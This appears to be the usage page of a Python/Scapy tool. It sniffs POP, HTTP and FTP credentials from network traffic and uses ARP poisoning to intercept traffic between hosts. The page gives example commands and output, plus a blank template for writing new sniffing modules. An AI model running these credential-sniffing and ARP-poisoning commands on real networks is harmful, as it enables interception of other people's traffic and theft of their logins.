Python / Scapy
./main.py -l
[*] Loading modules
|-Using all modules
[*] List of all modules
|-popCredentials (Sniff POP credentials)
|-httpCredentials (Sniff HTTP credentials)
|-ftpCredentials (Sniff FTP credentials)
sudo ./main.py -i mon0
[*] Loading modules
|-Using all modules
[*] Start sniffind on mon0
sudo ./main.py -i mon0 -m "ftpCredentials, popCredentials"
[*] Loading modules
|-Using popCredentials
|-Using ftpCredentials
[*] Start sniffind on mon0
sudo ./main.py -i eth0 -a 192.168.0.2-192.168.0.1
[*] Loading modules
|-Using all modules
[*] Start arp poisoning
[*] Start sniffind on eth0
touch ./modules/modulename.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
class module:
def processPacket(self, packet):
# write packet analysis here
def getDescription(self):
return "%s (%s)" % (self.moduleName, self.moduleDescription)
def __init__(self):
self.moduleName = "module name"
self.moduleDescription = "Module description"